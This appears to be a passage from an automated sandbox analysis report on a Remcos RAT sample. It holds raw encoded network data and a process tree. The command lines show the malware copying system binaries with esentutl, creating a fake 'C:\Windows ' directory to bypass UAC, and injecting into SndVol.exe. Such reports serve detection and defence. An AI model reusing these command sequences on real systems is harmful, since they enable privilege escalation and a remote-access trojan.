                                                                                                                      Data Ascii: lMqOzXoKgoF9dHukjox5R4cuiC2K0ISgjWCIWYxyhoCVgYJBfQiCAIhbj0qNPo4dged61ZHVfbyJv4D/k1iCZ5Nqi7KBSY0bgdx9FXnzfW2GtpBRgSOR55C/kPOO/YpgeFiTWCIpJq0oJr4kpsW0u6cFnqmgdrBFtiiop6R/tpWgSKcZtzGjyaLKpNOrx6TDru+oa6jMrGSta7F0paWti7K6rBCj+6BhsJaMKZbfiad5loLYgdl9EHp/gHGGF3n
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 70 31 36 62 6c 73 77 2b 6d 76 72 54 41 70 2f 47 65 39 4b 43 55 73 48 53 31 5a 71 71 78 70 72 53 33 4e 61 48 50 70 74 57 78 79 71 55 52 70 41 71 69 43 36 30 44 6f 6d 36 6f 54 4b 35 54 72 7a 71 71 48 4b 76 52 74 39 2b 6a 46 71 69 2b 74 67 4b 6f 63 61 64 61 70 45 69 30 74 61 64 36 6e 54 47 6c 4b 4c 55 6a 72 2b 65 73 79 62 41 4a 74 77 75 74 37 71 68 59 74 31 36 74 51 36 36 6f 6d 33 69 30 47 61 38 62 72 79 43 79 31 71 44 50 70 50 32 74 64 37 41 37 71 76 79 76 38 71 35 32 6f 33 57 67 51 36 34 78 72 77 36 73 38 61 70 61 72 59 2b 72 69 49 6a 63 66 39 57 4d 38 70 5a 69 6a 49 70 35 76 34 47 4e 66 51 70 37 50 59 34 72 65 4e 53 47 2f 34 68 65 69 6b 2b 44 63 6f 70 49 6a 75 43 4b 39 6f 41 43 6b 35 61 45 68 33 78 63 67 30 57 4b 46 59 33 48 6a 77 69 4d 6c 34 4a 72 65 5a
                                                                                                                      Data Ascii: p16blsw+mvrTAp/Ge9KCUsHS1ZqqxprS3NaHPptWxyqURpAqiC60Dom6oTK5TrzqqHKvRt9+jFqi+tgKocadapEi0tad6nTGlKLUjr+esybAJtwut7qhYt16tQ66om3i0Ga8bryCy1qDPpP2td7A7qvyv8q52o3WgQ64xrw6s8aparY+riIjcf9WM8pZijIp5v4GNfQp7PY4reNSG/4heik+DcopIjuCK9oACk5aEh3xcg0WKFY3HjwiMl4JreZ
                                                                                                                      2024-12-06 10:04:40 UTC1024INData Raw: 63 4b 30 49 78 4c 43 35 57 48 6a 51 6b 53 53 63 75 47 31 51 63 4c 69 5a 51 49 78 77 63 56 69 59 66 4a 55 30 77 4a 78 38 5a 4a 52 69 6e 76 63 30 65 4b 67 4d 78 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 6b 4d 66 41 30 4e 35 73 55 47 44 4d 5a 4b 68 38 6a 4b 79 67 63 4e 69 49 76 4c 42 38 75 4c 79 41 61 4b 53 4d 73 48 53 67 6d 49 68 67 78 47 79 59 77 48 69 51 68 4a 53 73 6b 4c 44 51 75 4b 43 30 6e 49 79 73 59 4c 6a 4d 75 48 79 45 72 4a 43 49 59 4d 52 73 67 49 7a 45 6d 4b 52 77 6a 48 43 77 5a 49 43 55 63 4c 78 67 66 48 42 6f 6e 4a 54 45 6e 49 53 6f 78 4d 54 41 6e 4d 43 55 75 49 79 6f 5a 47 43 63 7a 4e 53 49 70 4a 78 6b 6f 4a 78 30 62 4b 43 59 61 47 69 6c 4b 4d 44 41 75 55 42
                                                                                                                      Data Ascii: cK0IxLC5WHjQkSScuG1QcLiZQIxwcViYfJU0wJx8ZJRinvc0eKgMxMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHiskMfA0N5sUGDMZKh8jKygcNiIvLB8uLyAaKSMsHSgmIhgxGyYwHiQhJSskLDQuKC0nIysYLjMuHyErJCIYMRsgIzEmKRwjHCwZICUcLxgfHBonJTEnISoxMTAnMCUuIyoZGCczNSIpJxkoJx0bKCYaGilKMDAuUB
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 76 47 69 34 6a 4e 53 59 59 4a 79 77 71 49 69 6b 59 4a 69 67 6e 49 69 51 6f 49 69 55 6c 4b 53 4d 76 4c 79 34 59 49 53 73 62 4d 52 75 72 78 73 77 6c 4a 2f 67 6e 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 62 4c 50 30 78 4e 36 38 54 48 44 51 5a 4d 44 49 78 48 78 34 72 47 79 49 6e 4d 53 51 67 48 44 45 5a 4b 53 4d 6a 49 79 77 6d 49 42 6f 63 4d 42 67 67 48 43 55 6e 47 6a 45 59 49 54 55 78 4c 6a 41 59 4d 42 6f 75 48 43 6f 6d 47 42 67 7a 4b 69 49 32 4a 79 59 6f 47 42 30 6b 4b 42 30 61 4a 53 6b 63 4d 43 38 75 4a 78 34 72 47 79 34 6b 4b 79 67 67 47 69 63 73 4a 79 73 65 48 44 51 6f 48 43 6b 64 4c 79 77 67 4d 53 38 67 4a 54 59 6a 4c 43 49 33 4a 69 49 6e 4c 68 73 6d 4c 79 45 6b 49 52
                                                                                                                      Data Ascii: vGi4jNSYYJywqIikYJignIiQoIiUlKSMvLy4YISsbMRurxswlJ/gnKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGisbLP0xN68THDQZMDIxHx4rGyInMSQgHDEZKSMjIywmIBocMBggHCUnGjEYITUxLjAYMBouHComGBgzKiI2JyYoGB0kKB0aJSkcMC8uJx4rGy4kKyggGicsJyseHDQoHCkdLywgMS8gJTYjLCI3JiInLhsmLyEkIR
                                                                                                                      2024-12-06 10:04:40 UTC1024INData Raw: 65 4a 43 45 59 71 79 51 73 38 69 34 6f 4c 52 6b 6a 4c 78 67 78 4d 79 34 66 47 69 73 6b 49 69 63 78 47 79 41 63 73 53 59 70 59 69 4d 63 4c 45 69 67 4a 52 78 5a 47 42 38 63 54 36 63 6c 4d 59 38 68 4b 6a 45 74 4d 43 51 77 47 69 34 6a 4b 69 49 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78
                                                                                                                      Data Ascii: eJCEYqyQs8i4oLRkjLxgxMy4fGiskIicxGyAcsSYpYiMcLEigJRxZGB8cT6clMY8hKjEtMCQwGi4jKiIYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx
                                                                                                                      2024-12-06 10:04:40 UTC1749INData Raw: 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78 30 6b 4b 43 49 61 4a 53 6b 6a 4d 43 38 75 47 42 34 72 47 7a 45 6b 4b 79 67 66 47 69 63 73 47 43 73 65 48 43 73 6f 48 43 6b 69 4c 79 77 67 4c 69 38 67 4a 53 6b 6a 4c 43
                                                                                                                      Data Ascii: cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx0kKCIaJSkjMC8uGB4rGzEkKygfGicsGCseHCsoHCkiLywgLi8gJSkjLC
                                                                                                                      2024-12-06 10:04:40 UTC9000INData Raw: 4a 7a 45 62 49 42 77 78 4a 69 6b 6a 49 78 77 73 4a 69 41 6c 48 44 41 59 48 78 77 6c 4a 79 55 78 47 43 45 71 4d 53 34 77 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 79 6f 69 4b 53 63 6d 4b 43 63 64 4a 43 67 69 47 69 55 70 49 7a 41 76 4c 68 67 65 4b 78 73 78 4a 43 73 6f 48 78 6f 6e 4c 42 67 72 48 68 77 72 4b 42 77 70 49 69 38 73 49 43 34 76 49 43 55 70 49 79 77 69 4b 43 59 69 4a 7a 45 62 4a 69 38 65 4a 43 45 61 4b 79 51 73 4b 79 34 6f 4c 52 67 6a 4b 78 67 78 4d 79 34 66 48 69 73 6b 49 69 63 78 47 79 41 63 4d 53 59 70 49 79 4d 63 4c 43 59 67 4a 52 77 77 47 42 38 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77
                                                                                                                      Data Ascii: JzEbIBwxJikjIxwsJiAlHDAYHxwlJyUxGCEqMS4wJzAaLiMqJhgnMyoiKScmKCcdJCgiGiUpIzAvLhgeKxsxJCsoHxonLBgrHhwrKBwpIi8sIC4vICUpIywiKCYiJzEbJi8eJCEaKyQsKy4oLRgjKxgxMy4fHiskIicxGyAcMSYpIyMcLCYgJRwwGB8cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJyw
                                                                                                                      2024-12-06 10:04:40 UTC9000INData Raw: 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67 66 48 43 55 6e 4a 54 45 59 49 53 6f 78 4c 6a 41 6e 4d 42 6f 75 49 79 6f 6d 47 43 63 7a 4b 69 49 70 4a 79 59 6f 4a 78 30 6b 4b 43 49 61 4a 53 6b 6a 4d 43 38 75 47 42 34 72 47 7a 45 6b 4b 79 67 66 47 69 63 73 47 43 73 65 48 43 73 6f 48 43 6b 69 4c 79 77 67 4c 69 38 67 4a 53 6b 6a 4c 43 49 6f 4a 69 49 6e 4d 52 73 6d 4c 78 34 6b 49 52 6f 72 4a 43 77 72 4c 69 67 74 47 43 4d 72 47 44 45 7a 4c 68 38 65 4b 79 51 69 4a 7a 45 62 49 42 77 78 4a 69 6b 6a 49 78 77 73 4a 69 41 6c 48 44 41 59 48 78 77 6c 4a 79 55 78 47 43 45 71 4d 53 34 77 4a 7a 41 61 4c 69 4d 71 4a 68 67 6e 4d 79 6f 69 4b 53 63
                                                                                                                      Data Ascii: GyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBgfHCUnJTEYISoxLjAnMBouIyomGCczKiIpJyYoJx0kKCIaJSkjMC8uGB4rGzEkKygfGicsGCseHCsoHCkiLywgLi8gJSkjLCIoJiInMRsmLx4kIRorJCwrLigtGCMrGDEzLh8eKyQiJzEbIBwxJikjIxwsJiAlHDAYHxwlJyUxGCEqMS4wJzAaLiMqJhgnMyoiKSc
                                                                                                                      2024-12-06 10:04:40 UTC16384INData Raw: 4c 42 67 72 48 68 77 72 4b 42 77 70 49 69 38 73 49 43 34 76 49 43 55 70 49 79 77 69 4b 43 59 69 4a 7a 45 62 4a 69 38 65 4a 43 45 61 4b 79 51 73 4b 79 34 6f 4c 52 67 6a 4b 78 67 78 4d 79 34 66 48 69 73 6b 49 69 63 78 47 79 41 63 4d 53 59 70 49 79 4d 63 4c 43 59 67 4a 52 77 77 47 42 38 63 4a 53 63 6c 4d 52 67 68 4b 6a 45 75 4d 43 63 77 47 69 34 6a 4b 69 59 59 4a 7a 4d 71 49 69 6b 6e 4a 69 67 6e 48 53 51 6f 49 68 6f 6c 4b 53 4d 77 4c 79 34 59 48 69 73 62 4d 53 51 72 4b 42 38 61 4a 79 77 59 4b 78 34 63 4b 79 67 63 4b 53 49 76 4c 43 41 75 4c 79 41 6c 4b 53 4d 73 49 69 67 6d 49 69 63 78 47 79 59 76 48 69 51 68 47 69 73 6b 4c 43 73 75 4b 43 30 59 49 79 73 59 4d 54 4d 75 48 78 34 72 4a 43 49 6e 4d 52 73 67 48 44 45 6d 4b 53 4d 6a 48 43 77 6d 49 43 55 63 4d 42 67
                                                                                                                      Data Ascii: LBgrHhwrKBwpIi8sIC4vICUpIywiKCYiJzEbJi8eJCEaKyQsKy4oLRgjKxgxMy4fHiskIicxGyAcMSYpIyMcLCYgJRwwGB8cJSclMRghKjEuMCcwGi4jKiYYJzMqIiknJignHSQoIholKSMwLy4YHisbMSQrKB8aJywYKx4cKygcKSIvLCAuLyAlKSMsIigmIicxGyYvHiQhGiskLCsuKC0YIysYMTMuHx4rJCInMRsgHDEmKSMjHCwmICUcMBg


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:05:04:33
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\jW3NEKvxH1.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:05:04:42
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
                                                                                                                      Imagebase:0x1c0000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:05:04:43
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:04:43
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                      Imagebase:0x8e0000
                                                                                                                      File size:226'712 bytes
                                                                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:04:44
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:04:45
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:352'768 bytes
                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:04:46
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:12
                                                                                                                      Start time:05:04:48
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\xpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                      Imagebase:0x840000
                                                                                                                      File size:18'944 bytes
                                                                                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:05:04:57
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Dlaybpxl.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Dlaybpxl.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'285'120 bytes
                                                                                                                      MD5 hash:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:17
                                                                                                                      Start time:05:04:58
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:18
                                                                                                                      Start time:05:04:59
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:19
                                                                                                                      Start time:05:04:59
                                                                                                                      Start date:06/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                      Imagebase:0x8e0000
                                                                                                                      File size:226'712 bytes
                                                                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
